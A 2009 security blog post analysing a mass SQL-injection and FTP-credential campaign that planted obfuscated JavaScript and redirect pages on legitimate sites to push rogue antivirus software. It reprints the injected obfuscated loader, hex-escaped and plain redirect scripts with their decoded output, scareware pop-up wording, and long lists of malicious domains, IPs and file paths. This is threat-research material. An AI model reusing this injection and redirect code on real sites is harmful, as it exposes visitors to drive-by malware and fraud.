Sunday, March 8, 2009

Web Poisoning: Massive malware attacks + iframe exploit - 2009

Web Poisoning - Massive SQL injections, XSS attacks,
iframe and obfuscated javascript exploits from RBN

Compromised websites are used to spread rogue antivirus
like Antivirus360/2009/2010, MalwareDefender2009 etc...

Banned by search engines, ranking destructed,
unwanted popups/redirections...

A new web based threat (drive-by installs) is currently spreading at a rate
of about hundreds of site / day (may be more).

Started in 2008, a higher number of detection in the end of 2008
December, more and more in March 2009.

Higher detection:

Above 1000 websites in 24hours
15000 detected (may be more)

Websites affected: Number unknown
Computer affected: 30 million Windows PCs (PandaSecurity)

Number of variant:
7,000 variants of the type of malware over the last year alone

In the wild: Yes

First infection: July/August 2008
Latest infection found: 6 March, 2009

Related:

Scammers making '$15m a month' on fake antivirus
FakeAntivirus PandaSecurity

HostExploit’s Cyber Crime Series
Sinowal Trojan
Sohos - Snickerdoodles and FakeAV
-------------------------------------------------------------------------------------------------------------------

Spreading by FTP (stolen FTP password) this malware modifiy all
index/main/intro pages by inserting obfuscated javascript code.
 
Sample of the malicious code inserted:

function cniw(de,apyi){
if(!apyi){
apyi='=rmIqnV*C3MBpA8xSDGE6HTOoe-cQl&PiXjuYK4U
k9NL2w1z+;
h{7.RyZF(sfbWJ';
}
var y;
var OR='';
for(var dew=0;dew<de.length;dew+=4){
y=(apyi.indexOf(de.charAt(dew))&63)<<18|
(apyi.indexOf(de.charAt(dew+1))&63)<<12|
(apyi.indexOf(de.charAt(dew+2))&63)<<6|
apyi.indexOf(de.charAt(dew+3))&63;
OR+=String.fromCharCode((y&16711680)>>16,
(y&65280)>>8,y&255);
}
eval(OR.substring(0,OR.length-3));
}
cniw('l4nhCVKjxTDzoyHweTF7
8RKjBUlh-ODKMmQfQRAh3h2U-Or7CV;Xc4l.oTlKxG3NoOeXQ
RAh-Or7Cjr7&OrKxG37eOX7BR9Xl4n{oy39Q*SjxjQ98RKjBUlh
-ODKMml4lTFulVKzcjrL-4;.MmKsCmQ98RKjBUlh-ODKMmlRoOCi
cTXUem=bCISF8hQ98RKjBUlh-ODKMmlRoOCi-UXLCI7iMVDzoy
HweTF7B4lKlqH2eT.KcUDm&6KYMm3ye4fjMGYs3hYs-TC1ly3
9lV6k3R9Z-hF{l*K2eGF+cyA9lVKzcj=bCm3XoUAzc*H7eGCs3h
Ys-TC1ly39lV6k3R9Z-hF{l*K2eGFR-OA9o4K2-ODFCI7iCUe9QR
KjcV6j8hQ98RKjBUlh-ODKMmlN&V21QyDFcV61lRKYlViixG=RpI
ps3hYs-TC1ly39lV6k3R.keRSixG=;8m7hAj9w-VlYMuC.B{q2pG
wN&V21QyDFcV61lRKYlVis3hYs-TC1ly39lV6k3R9Z-hF{l*K2eG
F7cy=ixGrw-VlYM.+UQ*XQ3{2UMEw9ojFyQ4K7eGiU-UXLBUA
7&T;KB4;KeUSixGrw-VlYM.+UQ*XQ3{2UMEw9ojFyQ4K7eGiUP
GQ98RKjBUlh-ODKMmlKl4n2Mn+U-R92lGi9OmQ98hQ98RKjBUlh
-ODKMmQfByAuQjQL3RK+lIZUME2iCm==');
  
Result:

var ai = document;
ai.write('<scr' + 'ipt language="javascript" type="text/javascript">');
ai.write('function zp(){ ');
ai.write('var zx = 49;');
ai.write('var vsr = (document.getElementById("sy"));');
ai.write('vsr.style.position = "absolute";');
ai.write('vsr.style.visibility = "visible";');
ai.write('vsr.style.width = 603;');
ai.write('zx = 18-26*zx*25/1,1+vsr.style.width;');
ai.write('vsr.style.top = zx+\'px\';');
ai.write('vsr.style.left = zx+\'px\';');
ai.write('}'); ai.write('eval(\'zp()\');');
ai.write('</scr' + 'ipt>');
 * This script will simply HIDE all bad links inserted.
Normal visitor's will not see them
Analysis:
 
  
  
 Hundred or thousand of pages on legitimate domains were exploited
having web pages added with keywords (porn, celebrities etc..)
append to them as a means of attracting victims via search engine results
  
 
differents html pages (random name - approx. 1000 uploaded by victim)
   
shar__ackson_xxx.html
independent__escorts_derby.html
chexxxader_fxxed-terri__summers.html
allstar_strxx_poker.html
mike_rowe_nxxxe__pics.html
kexxxxxx__scene.html
 
under different folders (random name - 1 folder by victim)
 
bow-wzzzzzy
azzn-caxxxxa-uxxirt
men-women-bxxxilders
naxxnxxe-gallery
racxxl-star-amateur
 
The folder with the name below are used
 
_image/
_images/
_img/
_imgs/
etc...
 
(or inside a normal folder: backup, project etc...)
 
A complete site.

index.html
map.html
rss.xml (RSS Feed with thousand of links pointing to the links on the victim site)
Approximatively 1000 pages by site (victim)

These page result in redirection to malicious websites:

www.onlinedetect. com(Always active since 2008)
Registrar: ONLINENIC, INC.
http://private.dnsstuff.com/tools/whois.ch?domain=onlinedetect. com&email=on

Almost 10-20 domain is created every day

hxxp://QUICKSECURITYEXAMINEONLINE. COM (has served 3 days)

http://www.webnames.ru/scripts/who.pl?domain=
QUICKSECURITYEXAMINEONLINE. com

hxxp://instantprotectionscan . com (has served 4 days)
hxxp://wwwreadright . com
hxxp://stabilityexaminesite . com
hxxp://stabilitysolutionslook . com
hxxp://QUICKRESPONSESAFETY . COM
hxxp://onlinesafetyscan . com
 


Template used:

Sample StabilitySolutionsLook

***************************************************

All redirect to the same IP 94.247.3.3 (Zlkon. lv - Latvia)
http://www.google. com/safebrowsing/diagnostic?site=94.247.3.3

--------------- Google safe browsing report ----------------------
Malicious software includes 9689 adware(s), 9166 trojan(s),
5085 scripting exploit(s).

ohh sorry: just an update after 10 days.

Malicious software includes 10695 trojan(s), 9689 adware(s),
5259 scripting exploit(s).

Over the past 90 days, 94.247.3.0 appeared to function as an
intermediary for the infection of 671 site(s)

What happened when Google visited sites hosted on this network?

Of the 318 site(s) we tested on this network over the past 90 days, 18 site(s) served content that resulted in malicious software being downloaded and installed without user consent.

The last time Google tested a site on this network was on 2009-03-14,
and the last time suspicious content was found was on 2009-03-14.

Has this network hosted sites acting as intermediaries for further malware
distribution?

Over the past 90 days, we found 18 (update: 13) site(s) on this network that appeared to function as intermediaries for the infection of 2565 (update: 2922) other site(s).

Has this network hosted sites that have distributed malware?

Yes, this network has hosted sites that have distributed malicious software
in the past 90 days. We found 117 site(s) (updated: 122) that infected 9272 (updated: 11243) other site(s).


http://www.google. com/safebrowsing/diagnostic?site=AS:12553

-------------------------------------------------------------------------------------

Example of compromised website:

http://sanstabous.[BLOCKED]com.ar
http://sanstabous.[BLOCKED]com.ar/includes/common/_images/hawaii-asian-escort/
pierced-tounges-xxx.html

http://grzes77.[BLOCKED]webd.pl
http://grzes77.[BLOCKED]webd.pl/zdjecia/_images/teens-illustrated/index.html

http://64.177.[BLOCKED]12.146
http://64.177.[BLOCKED]12.146/templates/_images/oily-cock-massage/

RSS Example:

hxxp://64.177.[BLOCKED]12.146/templates/_images/oily-cock-massage/rss.xml


Analysis below:
http://wepawet.iseclab.org/view.php?hash=0b34948b0d01123e5cd
1caa0eb318ef5&t=1235086837&type=js


Inside all these pages uploaded by BOTS contain a javascript (redirection)
to onlinedetect. com or related sites (greatstabilitytraceonline. com)

---------------

Similar code: (same attack)
 
window.location = encodeURI("
http://www.onlinedetect. com/in.cgi?6
&tsk=sept-task11-r200-id11-t11-3bpri-al2nd&
type=l&seor ef=" + encodeURIComponent
(document.referrer) + "&parameter=$keyword
&se=$se&ur=1&HTTP_REFERER=" +
encodeURIComponent(document.URL)
+ "&default_keyword=XXX");

and here: hxxp://members.lycos. co.uk/mozila/473.html

<script language="javascript">
var scheme=5;
var default_keyword='';
alert(unescape('%77%69%6E%64%6F%77%2E%6C%
6F%63%61%74%69%6F%6E%3D%22%68%74%74
%70%3A%2F%2F%74%72%61%66%66%62%6F%
78%2E%63%6F%6D%2F%69%6E%2E%63%67%
69%3F%22%2B%73%63%68%65%6D%65%2B%22
%26%73%65%6F%72%65%66%3D%22%2B%65%
6E%63%6F%64%65%55%52%49%43%6F%6D%70
%6F%6E%65%6E%74%28%64%6F%63%75%6D%
65%6E%74%2E%72%65%66%65%72%72%65%72
%29%2B%22%26%22%2B%22%70%61%72%61%
6D%65%74%65%72%3D%24%6B%65%79%77%6
F%72%64%26%6B%65%79%77%6F%72%64%3D
%24%6B%65%79%77%6F%72%64%26%73%65%
3D%24%73%65%26%75%72%3D%31%26%48%
54%54%50%5F%52%45%46%45%52%45%52%
3D%22%2B%65%6E%63%6F%64%65%55%52%
49%43%6F%6D%70%6F%6E%65%6E%74%28%
64%6F%63%75%6D%65%6E%74%2E%55%52%
4C%29%2B%22%26%64%65%66%61%75%6C%
74%5F%6B%65%79%77%6F%72%64%3D%22%
2B%65%6E%63%6F%64%65%55%52%49%43%
6F%6D%70%6F%6E%65%6E%74%28%64%65%
66%61%75%6C%74%5F%6B%65%79%77%6F%
72%64%29%3B'));
</script>

Deobfuscated result:

window.location="http://traffbox.com/in.cgi?"+
scheme+"&seoref="+encodeURIComponent(docu
ment.referrer)+"&"+"parameter=$keyword&keyword
=$keyword&se=$se&ur=1&HTTP_REFERER="+enco
deURIComponent(document.URL)+"&default_
keyword="+encodeURIComponent(default_keyword);

Result: traffbox. com/in.cgi?5

<html><head>
<meta http-equiv="REFRESH" content="1; URL='http://gowayscan.com/?uid=12403'">
</head><body>
document moved
<a href="http://gowayscan. com/?uid=12403">
here</a>
</body></html>

Result: gowayscan. com/?uid=12403

Header location redirection

hxxp://litescan4. com/?uid=12403


Date:

tsk=aug-task3-r86-id57-t78-al2nd
tsk=july-task18-r86-id52-t58-obo22j
tsk=julyt20-r19-id54-obo-july11
tsk=sept-task9-r115-id25-t43-ale3nd
tsk=id67-01dec08-r91
tsk=julyt20-r19-id54-obo-july11
wrk=julyt06-r19-id061-z-july29
wrk=augt06-r19-id85-z-aug18
 
Entering these string in Google reveal tons of sites
(sql injections, xss attacks etc...)

On these sites we can also see some bad links to Google Video

****************************************
****************************************
****************************************

March UPDATE

Following 0day33hours. com and onlinedetect. com
redirect me to some
new site promoting InternetAntivirusPro
The domain list willl be published soon
Here are a few of them, some are not used,
some suspended etc...

Some has this common message:

Your computer remains infected by viruses!
They can cause data loss and file
damages and need to be cured as soon as possible.
Return to System
Security and download it secure to your PC

Windows is scanning your system for threats.
The scanning is provided by
our official partner Internet Antivirus Pro.
Please refrain from closing the window until the
scanning is finished.
We highly recommend you to install the full version
of Internet Antivirus
Pro scanner to monitor your PC for threats and
on-time security system updates.

Please note that Spyware is highly malicious for
your PC information privacy.
If you want to install the full version, please
click "Ok", wait for the page to load, start the
installation process and follow the instructions.
If you want to wait for scanning results to appear,
please click "Cancel".
After Internet Antivirus Pro is installed, you can
close the scanning window and remove Spyware
from your computer.

Serious security and privacy threats found on your
computer.
It may damage your files or steal your personal and
financial information.
Click "OK" to start downloading CRITICAL
security software update.

Your computer is running slower than normal,
maybe it is infected with Viruses, Adware
or Spyware.
RapidAntivirus will perform a quick and
completely FREE scan of your system for
malicious software.
Download RapidAntivirus for FREE now!.

(onlinescanweb. com)

Some Title:

My Computer
My computer Online Scan
Internet Security is important
Internet Antivirus Pro: best protection for Your privacy

Windows Security Center
RapidAntivirus
Virus Scan in Progress

Some URLs:

in.php
hitin.php
in.cgi?{3-6} (traffic management - avertlabs - Inside the malicious traffic)
cki.php?uid=keyin
?uid=keyin {/22/?uid=keyin - /26/?uid=keyin}

Some common files:

/script_en.js
/files/brand_constants.js
/files/text_constants_en.js
/files/this_landing.css
/files/domFunction.js
/files/startafter.js
/files/mouse_block.js
/files/unic_scripts.js
/files/pre_load.css
/common/destrub.js
/common/stata.js
/common/build/yahoo-dom-event/yahoo-dom-event.js
/installinfo/3/style.css
/nag/1/?uid=144&n=nag&install=1
/cki.php?uid=keyin
/download/install.php


Site Samples:









HTML detected as:

JS_FAKEALERT.AK

One is detected as Mal_FakeAV6
Two are detected as HTML_FAKEAV.ALO

destrub.js detected as

JS_DLOADER.UGD
JS_DLOADER.WJJ

*********************
Template RapidAntivirus (hxxp://onlinescanweb. com)

Template RapidAntivirus from onlinescanweb. com
Template RapidAntivirus from onlinescanweb. com
Template RapidAntivirus from onlinescanweb. com

*********************
Template SystemSecurity (hxxp://systemsecurityline. com)



*********************
File downloaded install.exe

Detected as:

Cryp_FakeAV-9
Cryp_FakeAV-10
Cryp_FakeAV-11

Different variants:

TROJ_INTERNETA.K
TROJ_AGENT.ANOE
TROJ_FAKEAV.ALS
TROJ_FAKEAV.AHJ
TROJ_FAKEAV.BML
TROJ_FAKALER.VO

IAInstall.exe is detected as:

TROJ_INTERNETA.H

Alias: Winwebsecurity

*********************

DCC48B8D-50BC-460B-B6D6-35E4E9BF258D

File downloaded SystemSecurity.exe or Setup.exe - VT

Detected as:

TROJ_AGENT.ANEM
TROJ_FAKEAV.AND
TROJ_RENOS.AVI



 

Some related domain: 69.64.33.242

Same template SystemSecurity
  
micro-ms-antivir. com
  
On the same server we also have otherfake av site

Reverse IP: 135 other sites hosted on this server.

CCLeaner Template and some other
 
2009system-cleaner. com
advanced-anti-virus. com
advanced-antivirus. com
antimalwarewarrior2009. com
antispyware-solutions. com
antiviral-softtools. com
antivirus-buy1. com
antivirus-cs2. com
antivirus-cs3. com
antivirus-cs4. com
antivirus-cs5. com
antivirus-cs6. com
antivirus-cs7. com
antivirus-cs8. com
antivirus-cs9. com
antivirus-cs10. com
antivirus-cs11. com
antivirus-cs12. com
antivirus-cs13. com
antivirus-cs14. com
antivirus-cs15. com
antivirusmaster2009. com
e-spy-punisher. com
fight-viruses-corp. com
kicks-mall. com
kill-adware-soft. com
killallspywares2009. com
malware-preventer. com
malware-remover2008. com
micro-adware-cops. com
micro-antivirus2008. com
spy-cops-2009. com
spy-re-mover. com
spy-terminators. com
spyware-remover-inc. com
superantivirus2009. com
sys-antispy2009. com
vis-antispy2008. com
windows-antispy2008. com
 
 

Watches
 
era-mall. com
luxury-mall. com
mypharmshop. com
premium-watches. com
watches-vendor. com
multibrand-shop. com
 
 

Pharma
 
hq-pharmacy1. com
hq-pharmacy2. com
mypharmshop. com
 
 

eCommerce
 
web-checkout1. com 
 

whois details show that"the domain owner"
also have 24 other domains

DNS Servers:

NS1.AAA-NAMESERVER. com
NS2.AAA-NAMESERVER. com

Domain used:

***********************************************
Domain served...

Registrar: BIZCN. com, INC.
  
0day33hours. com
moxnatko. com(SUSPENDED)
 

Registrar: REGTIME LTD. (webnames.ru)

 ThreatExpertTasteAV - Google etc..
    
beststabilityscan. comReportsSymantec - VirusTotal
dynamicstabilityexamine. comReportReportsGoogle - Google
dynamicstabilityread. com ReportsGoogle - Google
esnetscanonline.com ReportsSymantec
fastdirectdownloadserver. comReport(Winweb Security)
faststabilityexamine. com ReportsGoogle
fuckmoneycash. comReport(IP: 209.44.126.14)
greatstabilityscanonline. com  Google - FireEye
greatstabilitytraceonline. com ReportsGoogle - Google
instantsecurityscan. comReportReportsGoogle
internetexamine. com  Symantec
internetsecurityexamine. com  Reports 
netsecurityonline. com  Mcafee
networkstabilityexamine. com  Google - Symantec
onlineprotectionscan. com  Google
onlinesafetyscan. com  Google
onlinesecuredownload. comReport  
onlinestabilityscanada. com   
onlinestabilityexamine. com   
onlinestabilityguide. com Reports 
onlinestabilityscan. com   
onlinestabilitysite. com   
outsthehit. com Report  
protectionread. com Report  
quickresponsesafety. com  Google
quicksecurityexamineonline. com   
quickstabilityscan. comReport  
quicksecurityskim. com
Report  
readysecurityscan. com  Google
safetyexamine. com   
safetyinternetscan. com   
safetyonlinescan. com   
safetyread. com   
safetywwwscan. com   
scansecurityonline. com   
scanstabilityavailable. com   
scanstabilityinternet. com   
scanstabilityonline. comReport  
scanworldonline. com   
securewebscan. com   
securithyonsite. com   
stabilityscanweb. comReport  
stabilitysolutionslook. comReport  
stabilityskim. com   
stabilitytraceweb. comReport  
thestabilityinternetworld. comReport  
safesoftwaretransfer. comReport  
scansecurityonline. comReport  
scanstabilityonline. comReport  
scanusonline. comReport  
scanworldguide. comReport  
securecrtdownload. com
Report  
securefilecourier. com
Report  
securefileservices. comReport  
secureshelldownload. comReport  
securedownloaddirect. comReport  
securedownloadsoftware. com Report  
securetransferonline. comReport  
securityonlineread. com  Symantec
securityonlinescan. com    
securityscanworld. comReport  
serverfastdownload. comReport  
stabilityaudit. com   
stabilityscandirect. com Reports 
stabilityscanweb. com   
stabilityexamineguide. comReport  
stabilityexamineonline. com   
stabilityexaminesite. com   
stabilityinternetearthguide. com   
stabilityinternetglobalonline. com  411-spyware
stabilityinternetscan. com   
stabilityinternetworld. com   
stabilitynet. com   
stabilityonline. com   
stabilityonlinedirect. com   
stabilityread. com   
stabilityseeonline. com   
stabilityscan. com  FireEye
stabilityscandirect. com   
stabilitysolutionslook. com  Symantec Google
stabilitytrace. com   
stabilitytraceonline. comReport  
stabilitytraceweb. com   
stabilityscanavailable. com Report 
stabilityscanonline. com   
stabilityscanweb. com   
superstabilityread. com  Mcafee
systemsecurityonline. comReport - 2,3ReportsSymantec - McAfee
swiftsafetyexamine. com   
thesafedownload. comReport  
thesecuredownload. comReport  
thesecuretransfer. comReport  
thestabilityscan. com   
thestabilityweb. com   
thestabilityinternetworld. com   
websafetyscan. com    
websecurityexamine. com   
webprotectionswipe. comReport  
webreadon. com Report  
winwebsecurity. comReport  
wwwexamine. comReport  
wwwreadright. com   
wwwsafeexamine. com   
wwwsecurityexamine. com Report  
wwwsecurityread.com   
wwwstabilityscan. com   
wwwmobilereads. comReport  
yourstabilityscan. com   
    
    

Domain used for redirections:Previous IPActual IP
 69.41.182.1292.62.101.122
acousticnail.cn  
allradiohits. com  
bankinggolf.cn  
buyyourhomes. com  
designroots.cn  
drawingstyle.cn  
housedomainname.cn   
musicdomainer.cn  
nicescores.cn  
oceandealer.cn  
partsocean.cn  
peopleopera.cn  
rainfinish.cn  
travets.cn  
vitamingood.cn  
websiteflower.cn  
worksean.cn  

Registrar: PUBLICDOMAINREGISTRY.com
   
Some domain are using DNS below.
   
bestjetsblog. com (SUSPENDED) 
buyyourhomes. com(SUSPENDED) 
detectspywares.info(SUSPENDED) 
extrasdiscount.net(SUSPENDED) 
funbookclub.net(SUSPENDED) 
hadjhadj.info(SUSPENDED) 
goldmagicclub. com(SUSPENDED) 
mediamiddle.net(SUSPENDED) 
movieextrasworld. com(SUSPENDED) 
providesite. com(SUSPENDED) 
stocktradeshop.net(SUSPENDED) 
theyourlife. com(SUSPENDED) 
yourcollectorcar.net(SUSPENDED) 
   
Sponsoring Registrar: 厦门华融盛世网络有限公司
Translated to:Xiamen Huarong Spirit Network Limited
   
Registration Service Provided By: VIVIDS MEDIA GMBH
   
findcommon. com  
 
 
----------------------------------------------------------------------

Domainused to analyse traffic from compromised website:

(UPDATE: DNS Suspended - Site are not available - 69.41.182.12)
(UPDATE: DNS Updated - Now moving to Starline in Estonia - 92.62.101.122)
(UPDATE:
Name Server:ns1.opa-opa-nixuya. net
Name Server:ns2.opa-opa-nixuya. net
Name Server:ns1.travets. cn
Name Server:ns2.travets. cn
)

vitamingood. cn (registered by REGTIME. LTD - hosted by webnames.ru)
peopleopera.cn (registered by REGTIME. LTD - hosted by webnames.ru)
nicescores.cn (registered by REGTIME. LTD - hosted by webnames.ru)
buyyourhomes. com (registered by REGTIME. LTD - hosted by webnames.ru)

using the following DNS: 69.41.182.12/69.41.182.13 (800hosting.net - US)

UPDATE (DNS SUSPENDED)

hxxp://ns1.bestjetsblog. com
hxxp://ns1.extrasdiscount.net
hxxp://movieextrasworld. com
hxxp://NS1.FINDCOMMON. com
Parked - SedoNS1.GOLDMAGICCLUB. com
hxxp://NS1.MEDIAMIDDLE.NET
hxxp://ns1.funbookclub.net
hxxp://NS1.PROVIDESITE. com
hxxp://NS1.STOCKTRADESHOP.NET
hxxp://NS1.THEYOURLIFE. com
hxxp://NS1.THECLUBGOLF.NET
 

94.247.3.3ThreatExpertSymantec
   
internetsafetyskim.com  
safetyexamine. com  
securityscandirect. com  
wwwsecurityread.com  
   
hs.3-3.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
 

94.247.3.41ThreatExpertSymantec
   
avpaymentpro. com  
cokiran. com  
iavpaymentpro. com  
go-scan-pro. comReport 
gonewscan. comReport 
goscanweb. comReport 
gosscan. com  
ia-payment-pro. com  
ia-scanner-pro. com  
ia-scannerpro. com  
internet-antivirus-pro. com   
livestopbadware. com  
stased. com  
mysscan. com  
websscan. com  
 
hs.3-41.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  

94.249.3.40  
   
fast-antimalware-scan. comContinue here
 
Netcraft
 
hs.3-40.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  

94.247.3.42ThreatExpertSymantecVirustotal
    
ia-payment. com   
ia-scanpro. com   
goscan-pro.com   
    
 
hs.3-42.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  

94.247.3.74ThreatExpertSymantecVirustotal
    
instantsecurityscanworld. com   
thestabilityscan. comReport  
yourstabilityscan. comReport  
safetyscanworld.comReport  
stabilityscandirect. comReport  
webnetsafety.comReport  
webstabilityscan. comReportReportReport
    
Netcraft
 
hs.3-74.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  

94.247.2.84 Trend Micro
   
files.msas2009dl. com TROJ_FAKEAV.AID
  TROJ_FAKEAV.GDS
  TROJ_DLOAD.PG
  TROJ_FAKEAV.AIN
addantivirus. com  
antiviruscheckout. com  
   
hs.2-84.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  

94.247.2.133ThreatExpert 
   
int.msproreport1. comPE_VIRUT 
int.msproreport2. com  
Related: irc.zief.[blocked]pl  
   
int.proreportms1. comWinSpywareProtect
   
ThreatExpert: rogueantispyware-winspywareprotect
 
hs.2-133.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  

94.247.2.137 Trend Micro
   
hxxp://msantispyware2009. com TROJ_FAKEAV.AID
  TROJ_FAKEAV.GDS
  TROJ_DLOAD.PG
  TROJ_FAKEAV.AIN
hxxp://addantivirus. com  
hxxp://antispylinks. com  
hxxp://antispylist. com  
hxxp://antispyme. com   
hxxp://antispypro. com  VirusTotal - Anubis
hxxp://antispywareup. com   
hxxp://antiviruscheckout. com  
hxxp://antivirusup. com   
hxxp://goldpcguard .com  
hxxp://pcsecuretools. com  
   
files.msas2009dl. com (94.247.2.84)

setup_1.exe
 TROJ_DLOAD.ML
   
hs.2-137.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  

lol




94.247.2.215OtherAV
   
antivirus--plus.com  
antivirus-plus-new. com  
antivirusplus.biz  
antivirusplus2009. com  
antivirusplus2009. net  
avplus2009. com  
bestnetcheckonline. comVirusTotal 
downloadantivirusplus. comThreatExpertAntivirusPlus.exe VT
easynetcheckonlineContinue here
internet-check. net  
onlinescanweb. com Symantec
onlinewebscan. com  
rapldhsare. com  
security-check-center. comVirusTotal 
traffchecking. com  
www.antivirusplus2009. netArticle 
   
hs.2-215.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  
ThreatExpertRogueAntiSpyware.System Security
ThreatExpert's awareness of the file "systemsecurity.exe"

94.247.2.241ThreatExpertAV
   
hxxp://int.ms-asreport1. comReportMcAfee
   
Alias: MS AntiSpyware 2009
msas2009.exe Prevx
 
Related:
hxxp://www.antispyme. com (64.191.12.38 - Netcraft)
 
Payment page:
hxxp://sales.getpaymentform. com 94.247.2.42 Netcraft
 
hs.2-241.zlkon.lv - DATORU EXPRESS SERVISS - ZLKON
  

64.191.12.38ThreatExpert 
Previous IP: 94.247.2.137   
   
hxxp://addantivirus. com  
hxxp://antispylinks. com 
hxxp://antispylist. com  
hxxp://antispyme. com  
hxxp://antiviruscheckout. com  
.............................  
hxxp://pro-antispyware2009. com  
hxxp://syscleanerpro. com  
hxxp://systemcleanerpro. com  
hxxp://system-cleanerpro. com  
hxxp://totalantispyware. comReport 
hxxp://totalantispyware. net  
hxxp://totalantispyware2009. com  
   
Listed at hpHosts  
   
"Ms Antispyware 2009" source.

Common download:

hxxp://files.msas2009dl. com
TROJ_DLOAD.ML

Common payment page:

hxxp://sales.getpaymentform. com
   

94.247.2.253ThreatExpert 
   
interinetskim. comReport 
   

91.211.65.50ThreatExpertAV
   
avscan7. com McAfee - VirusTotal
scan5new. com McAfee - VirusTotal
   
Ural-NET
Ural Industrial Limited Company
Russia
AP10609-RIPE
uralnet.biz
  
   

 ThreatExpertAV,Google,other
91.211.65.110  
91.211.65.111   
   
ns2.stabilityscanonline. com FireEye
stabilityscanonline. com  
   

 ThreatExpertAV,Google,other
91.211.64.173  
91.211.64.174   
   
ns1.stabilityscan. com FireEye
ns2.stabilityscan. com  
stabilityscan. com  
   

 ThreatExpertAV
91.211.65.130  
   
ns1.internetskim. com  
ns1.stabilityinternetearthguide. com  
greatstabilityscanonline. com VirusTotal
   
91.211.65.131  
   
ns2.internetskim. com  
ns2.stabilityinternetearthguide. com  
   
91.211.66.10  
   
avscan7. com  
ns2.avscan7. com   
ns2.scan5new. com   
scan5new. com  
   

209.249.222.48  
   
antiviralscanner14. com  
easywinscanner17. com  
privacyscanner15. com  
sg9scanner. com  
sg10scanner. com  
sg11scanner. com  
sg12scanner. com  
sgviralscan. com  
   

209.44.126.22ThreatExpert 
   
onlinestabilitysite.com  
protectionskim.com Report 
safetyscansite.com Report new
stabilityaudit.comReport 
yourstabilitysystem.comReportnew
   

207.126.166.11  
   
gomegascan.com  
   

209.44.126.16  
   
   
onlinestabilityguide.com  
onlinestabilitysite.com  
onlinestabilityworld.com  
systemsecurityonline.com Symantec
   

207.126.166.21  
   
scanlog6. com  
scanmain6. com   
   

207.126.166.22  
   
basescan6. com  
scanhome4. com  
scangate6. com  
gatescan6. com  
homescan6. com  
home6scan. com  
everscan6. com  
scan6now. com  
scan6gate. com  
scanhome6. com  
scangate6. com  
scanlead6. com  
   

207.126.166.41  
   
scanhome4. com  
scanjust4. com   
   

207.126.166.59  
   
goeverscan. com  
gojustscan. com  
goleadscan. com  
golinescan. com  
gologscan. com  
goscanhome. com  
goscanjust. com  
goscanlog. com  
goscanmega. com  
goscantool. com  
goscanzoom. com  
gotoolscan. com  
gouserscan. com  
scanever4. com  
scan5best. com  
   

207.126.166.83x 
   
gomegascan. com  
goscanbay. com  
goscanfuse. com  
goscansafe. com  
goscanuser. com  
goscanway. com  
gozoomscan. com  
scan6ever. com  
scan6gate. com  
just6scan. com  
justscan6. com  
linescan6. com  
scanbase6. com  
leadscan6. comMarch 13 
lead6scan. com  
   

207.126.166.84  
   
in6co. com  
scan6home. com  
scaneasy6. com  
scanplus6. com  
   

207.126.161.230  
   
gogatescan. com  
gohomescan. com  
gojustscan. com  
   

209.44.126.14ThreatExpert 
   
bestfiresfull. com   
fuckmoneycash. comReport 
getscanonline.comReport 
mostpopularscan. com  
scanvistanow. net   
vistastabilitynow. comReport 
worldnowhits. com  
   

209.44.126.22ThreatExpert  
    
onlinestabilitysite. com   
onlinestabilityworld. comReport  
onlinestabilityguide. comReport  
    

216.21.239.197  
   
scan4life. com  
   

62.193.202.6  
   
in8co. com  
   

65.55.39.12  
   
plusscan6. com  
scan6fast. comPARKED 
   

66.101.58.54  
   
easyscan6. com  
fastscan6. com  
gate6scan. com  
gobasescan. com  
igo5scan. com  
goopenscan.com  
goscangate. com  
goscanmain. com  
goscanplus. com  
goscan5. com  
scan6base. com  
scan6lead.com  
scan6line. com  
zoomscan6. com  
   

66.197.154.198  
   
go4scan. comAnalysis on March13 
   

69.10.52.12  
   
5scanav. com  
scan5av. com  
in5co. com  
in5is. com  
in5sk. com VirusTotal
live5scan. com  
livescan4. com  
livescan5. com  
scan5plus. com  
   

67.208.74.12PARKED 
   
scan6easy. com  
scan6fast. com  
scanbest6. com  
scanlive6. com  
scannew6. com  
   

67.214.175.74  
   
scan4user.com  
scan4zoom. comSymantec Safe Web 
   

67.214.161.149  
   
mainscan6. comSymantec Safe Web 
   

74.125.45.100  
   
scanbase4. com  
scangate4. com  
scan6ever. com  
   

72.232.186.18
TasteReportsAnubisThreatExpert
    
systemsecurityline. comReportReportReport - 2 - 3
    

78.129.166.225ThreatExpert 
   
scanaonline. com  
stabilityonlinedirect. com  
webprotectionread. comReport 
wwwsafetyscan. com  
   

78.129.4.41Javascript Analysis 
   
scanaonline. comReport 
   

78.47.172.66   
   
antivirus360-protection. comAnalysis 
protectionsoftwarecheck. comAnalysis 
   

fast-antimalware-scanner. comRobtexAlexa
 Google Image
nameservers used by this domain  
   
ns1.basicstechnology. com
ns2.basicstechnology. com
ns3.basicstechnology. com
Robtex
Robtex
Robtex
 
   
domains sharing nameservers
under another name
  
   
antivirus-premium-scan.com
antivirus360-protection.com
eosads.com
onlinetds.info
powertds.ws
privateinfoclick.com
protection-fast-scanner.com
safeinternetzone.com
securedclickhere.com
software-clicks.com
Robtex
Robtex
Robtex
Robtex
Robtex
Robtex
Robtex
Robtex
Robtex
Robtex
 
   
advertisechoice.cn
awardspacelooksbig.cn
bestantimalwarelivescan. com
bestantimalwarescanner. com
falloutneferwin.cn
fast-antimalware-pro-scan. com
fastantimalwarelivescan. com
fastantimalwareproscan. com
fastantimalwareproscanner. com
fastantimalwarescan. com
Robtex
Robtex
Robtex
Robtex
Robtex
Robtex
Robtex
Robtex
Robtex
Robtex
 
   
ip numbers of nameservers  
   
115.126.5.10
64.86.17.44
91.211.64.47
Robtex
Robtex
Robtex
 
   
other names of the nameservers  
   
dns2.systempromns. com
dns3.systempromns. com
ns1.eguassembly. com
ns1.europegigabyte. com
ns1.fastfreetest.cn
ns1.freehostns. com
ns1.managehostdns. com
ns1.singatours. com
ns2.freefastdns. com
ns3.eguassembly. com
Robtex
Robtex
Robtex
Robtex
Robtex
Robtex
Robtex
Robtex
Robtex
Robtex
 
   

Antivirus360 source

  

78.157.143.184Robtex 
 
*.avproscan. com  a 

78.157.143.184     
78.157.128.0/19

SIA ULTRANET AS35057
